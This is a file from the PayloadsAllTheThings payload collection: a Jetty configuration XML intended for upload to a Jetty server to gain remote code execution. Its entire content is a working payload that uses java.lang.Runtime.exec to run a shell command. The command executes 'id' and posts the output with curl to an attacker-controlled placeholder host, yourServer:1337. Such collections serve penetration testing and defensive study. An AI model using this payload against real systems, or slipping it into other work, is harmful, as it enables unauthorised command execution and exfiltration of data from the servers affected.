PayloadsAllTheThings/Upload Insecure Files/Jetty RCE/JettyShell.xml

15 lines
568 B
XML
Raw Permalink Normal View History

2022-08-09 20:05:45 +00:00
<?xml version="1.0"?>
<!DOCTYPE Configure PUBLIC "-//Jetty//Configure//EN" "https://www.eclipse.org/jetty/configure_10_0.dtd">
<Configure class="org.eclipse.jetty.server.handler.ContextHandler">
<Call class="java.lang.Runtime" name="getRuntime">
<Call name="exec">
<Arg>
<Array type="String">
<Item>/bin/sh</Item>
<Item>-c</Item>
<Item>curl -F "r=`id`" http://yourServer:1337/</Item>
</Array>
</Arg>
</Call>
</Call>
</Configure>